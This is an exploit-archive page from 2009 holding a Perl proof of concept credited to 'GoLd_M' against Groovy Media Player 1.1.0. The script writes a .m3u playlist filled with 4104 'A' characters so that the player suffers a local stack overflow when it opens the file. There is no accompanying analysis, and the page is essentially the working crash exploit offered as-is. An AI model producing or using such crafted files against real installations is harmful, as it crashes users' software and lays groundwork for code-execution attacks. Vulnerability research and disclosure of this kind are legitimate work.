[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Groovy Media Player 1.1.0 (.m3u File) Local Stack Overflow PoC
# Published : 2009-04-20
# Author : GoLd_M
# Previous Title : CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC
# Next Title : Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)


# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
# #  Groovy Media Player Version 1.1.0 (.M3U File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ### ## ##
my $chars= "A" x 4104;
my $file="goldm.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created n";
print "Thanx Tryag.Com";

# www.Syue.com [2009-04-20]